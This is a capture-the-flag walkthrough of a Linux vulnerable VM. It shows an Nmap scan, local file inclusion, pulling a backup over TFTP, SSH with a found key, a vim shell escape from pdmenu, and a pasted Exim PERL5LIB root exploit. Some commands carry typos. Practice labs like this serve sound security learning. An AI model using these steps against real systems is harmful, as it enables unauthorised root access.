The file can be used with VMWare as well as VirtualBox. The machine is Linux based. The objective is to read the flag present in the machine with root privileges. Downloaded and fired up, it presents with a login screen with shows the target IP:
Since we have our target IP, let’s scan and see what we can find:
For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are three ports open:
Port 22 – Used for SSH Port 80 – Used to serve a web application Port 3306 – Running MySQL
Seeing that port 80 is open, my first instinct was to check what’s the server running:
Looking at the URL formed, it made me try to look for LFI (Local File Inclusion), and it worked:
http://172.16.92.142/index.php?page=about.php
Looking at the output, it talks about a user called backup-user whose job is to take periodic backups and store them. Let’s see what it shows us:
To get the backup.tar file, I used to connect with TFTP (Trivial File Transfer Protocol) and downloaded the backup.tar file: $ tftp tftp> connect 172.16.92.142 tftp> get backup.tar tftp> quit On extracting the contents of backup.tar, we see there are two folders:
Home Var
$ tar -xvf backup.tar On further examination, we see that the user Paul, has a few keys up his sleeves:
Let’s try to use them and see if any of them works. After trying a few, id_key4 showed the following: $ ssh -I id_key4 paul@172.16.92.142
Here, we are presented with pdmenu. To get to a shell, go on to Edit file and enter any file name. You will be presented with vim, and to exit to a shell, simply write: :set shell =/bin/bash and then type :shell to exit to a shell
Checking about the user and the system, we find:
Now to read the flag, we need to get root privilege. After doing some research, I found the following exploit (https://www.exploit-db.com/exploits/39535/). Simply copying and pasting the following, gave us root: cat > /tmp/root.pm « EOF package root; use strict; use warnings; system(“/bin/sh”); EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
and voila, we have the flag: